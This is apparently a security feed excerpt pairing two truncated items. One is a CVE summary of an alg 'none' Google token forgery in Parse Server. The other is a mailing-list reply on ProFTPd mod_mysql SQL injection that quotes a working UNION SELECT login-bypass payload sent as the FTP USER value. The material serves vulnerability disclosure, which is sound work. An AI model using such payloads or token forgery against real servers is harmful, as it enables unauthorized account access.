CVE-2026-27804

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.3 and 9.1.1-alpha.4, an unauthenticated attacker can forge a Google authentication token with alg: "none" to log in as any user linked to a Google account, without knowing...

Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Looks like a very serious issue to me - it works on our ProFTPD 1.3.2rc2 Server latest stable on gentoo. 220 ProFTPD 1.3.2rc2 Server Pumpkin xx.xx.xx.xx USER ' and 1=2 union select 1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell from ftp 331 Password...